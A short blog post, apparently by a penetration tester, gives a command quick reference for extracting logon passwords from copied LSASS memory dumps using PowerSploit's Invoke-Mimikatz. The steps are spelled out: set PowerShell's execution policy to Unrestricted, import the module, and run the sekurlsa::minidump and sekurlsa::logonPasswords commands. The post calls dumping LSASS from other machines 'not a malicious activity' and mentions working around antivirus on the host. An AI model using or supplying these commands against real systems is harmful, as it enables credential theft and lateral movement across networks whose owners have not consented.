Saturday, 20 August 2016

Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz

Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.

However, wanted to crack passwords for other systems!!!

Simply get LSASS dump from other machines - Not a malicious activity!
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.

Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.

Commands Quick Reference :

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module.\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'   

Good references :

No comments:

Post a Comment